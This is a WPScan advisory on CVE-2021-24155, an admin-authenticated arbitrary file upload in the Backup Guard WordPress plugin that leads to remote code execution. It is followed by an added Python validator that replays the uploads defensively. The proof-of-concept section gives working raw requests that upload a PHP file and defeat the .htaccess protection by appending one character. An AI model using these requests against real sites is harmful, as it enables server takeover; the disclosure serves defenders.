WPScan

WordPress Plugin Vulnerabilities

Backup Guard < 1.6.0 - Authenticated Arbitrary File Upload

Description

The plugin did not ensure that imported backup files are in the SGBP format and carry the .sgbp extension, allowing high-privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE.

Additional info and bypass of the .htaccess protection, found by the WPScan team while confirming the issue:

There is a protection in place against accessing the uploaded files, via a .htaccess in the wp-content/uploads/backup-guard/ folder. However:
- Some web servers do not support .htaccess (e.g. Nginx), making it useless in such cases
- Arbitrary content can be appended to the existing .htaccess, making the deny from all directive invalid and bypassing the protection on web servers such as Apache


Note: v1.6.0 forces uploaded files to have the .sgbp extension by appending it when absent, but the file content is still not verified. A PHP payload stored as .sgbp could therefore still be chained with another issue, such as an LFI or Arbitrary File Renaming vulnerability, to achieve RCE.

Proof of Concept

Video of the issue on a Nginx Web server, as sent by the reporter: https://drive.google.com/file/d/1W9faaIZ6rPgrui8lzeY2s9cgKrGJhWTL/view?usp=sharing

Additional Info (WPScanTeam):

As an administrator, open the Backup page (/wp-admin/admin.php?page=backup_guard_backups) and import a PHP file. It will be stored at /wp-content/uploads/backup-guard/<filename.php>.

If the web server supports .htaccess, import a file named .htaccess with b as its content. It is appended to the existing .htaccess, turning deny from all into deny from allb, which no longer restricts access but raises no error.

Raw requests:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 229
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename="info.php"
Content-Type: text/php

<?=phpinfo();?>
-----------------------------130490272991349650929022108--


If .htaccess is supported by the web server, the following request removes the protection by appending a b to the existing deny from all line:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 216
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename=".htaccess"
Content-Type: text/php

b
-----------------------------130490272991349650929022108--
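The two uploads above, and the checks the plugin was missing, as an added example that is not part of the advisory or of the Backup Guard code. It rebuilds the multipart bodies from the raw requests, parses them back, and runs them through the validation the page describes (filename, extension and content), then shows why appending a single b defeats the .htaccess protection. SGBP_MAGIC and looks_like_sgbp() are assumptions standing in for the real SGBP format parser, which the page does not describe; the sample payloads are constructed.

```python
import os
import re

# Boundary copied from the advisory's raw requests; the bodies below are constructed.
BOUNDARY = "---------------------------130490272991349650929022108"
# Hypothetical marker: a real implementation must parse the actual SGBP container.
SGBP_MAGIC = b"SGBP"


def build_upload(filename: str, content: bytes, content_type: str = "text/php") -> bytes:
    """Build a multipart/form-data body shaped like the importBackup request."""
    head = (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="files[]"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    return head + content + f"\r\n--{BOUNDARY}--\r\n".encode()


def parse_multipart(body: bytes, boundary: str = BOUNDARY) -> list:
    """Minimal multipart/form-data parser: returns [(filename, payload_bytes), ...]."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        if chunk.startswith(b"\r\n"):
            chunk = chunk[2:]
        raw_headers, _, payload = chunk.partition(b"\r\n\r\n")
        if payload.endswith(b"\r\n"):        # CRLF before the next boundary belongs to the delimiter
            payload = payload[:-2]
        disposition = ""
        for line in raw_headers.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            if name.strip().lower() == "content-disposition":
                disposition = value
        m = re.search(r'filename="([^"]*)"', disposition)
        parts.append((m.group(1) if m else None, payload))
    return parts


def looks_like_sgbp(content: bytes) -> bool:
    """Placeholder format check (assumption) standing in for a real SGBP parse."""
    return content.startswith(SGBP_MAGIC)


def validate_import(filename, content, format_check=looks_like_sgbp):
    """Checks the plugin should apply before writing an imported file to disk.

    Returns (accepted, reason). An extension check alone (the 1.6.0 fix) is not
    enough: a PHP payload named payload.sgbp still lands in a web-reachable folder.
    """
    name = filename or ""
    if name != os.path.basename(name) or name in ("", ".", ".."):
        return False, "filename contains a path component"
    if name.startswith("."):
        return False, "dotfiles rejected (would append to or overwrite .htaccess)"
    if not name.lower().endswith(".sgbp"):
        return False, "extension is not .sgbp"
    if not format_check(content):
        return False, "content is not an SGBP backup"
    return True, "accepted"


def htaccess_denies_all(text: str) -> bool:
    """True only if an intact deny directive survives (Apache 2.2 or 2.4 syntax)."""
    return any(line.strip().lower() in ("deny from all", "require all denied")
               for line in text.splitlines())


def run_demo() -> dict:
    """Replay the advisory's two uploads plus a .sgbp-renamed PHP file through the validator."""
    results = {}
    cases = {
        "info.php": b"<?=phpinfo();?>",        # first raw request on the page
        ".htaccess": b"b",                      # second raw request on the page
        "shell.sgbp": b"<?=phpinfo();?>",       # what an extension-only fix would store
        "site.sgbp": SGBP_MAGIC + b"\x00\x01constructed backup blob",
    }
    for fname, payload in cases.items():
        parsed_name, parsed_payload = parse_multipart(build_upload(fname, payload))[0]
        assert (parsed_name, parsed_payload) == (fname, payload)
        results[fname] = validate_import(parsed_name, parsed_payload)[0]
    # The .htaccess upload appends "b" to a file whose last line is "deny from all".
    original = "deny from all"
    results["htaccess_before"] = htaccess_denies_all(original)
    results["htaccess_after"] = htaccess_denies_all(original + "b")
    return results


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key:16} -> {value}")
```

A real backup of a WordPress site legitimately contains PHP source, so scanning the upload for PHP tags is not a usable content check; the import handler has to parse the SGBP container itself, which is what looks_like_sgbp() stands in for here. Rejecting dotfiles and path components is what closes the .htaccess append shown in the second request, and storing imports outside the web root removes the dependency on .htaccess altogether.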

Affects Plugins

backup
Fixed in version 1.6.0

References

CVE
CVE-2021-24155

Classification

Type

UPLOAD

CWE
CWE-434

Miscellaneous

Original Researcher

Nguyen Van Khanh - SunCSR (Sun* Cyber Security Research)

Submitter

khanh

Submitter website
http://research.sun-asterisk.com/
Verified

Yes

WPVDB ID
d442acac-4394-45e4-b6bb-adf4a40960fb

Timeline

Publicly Published

2021-02-18

Added

2021-02-18

Last Updated

2021-02-20
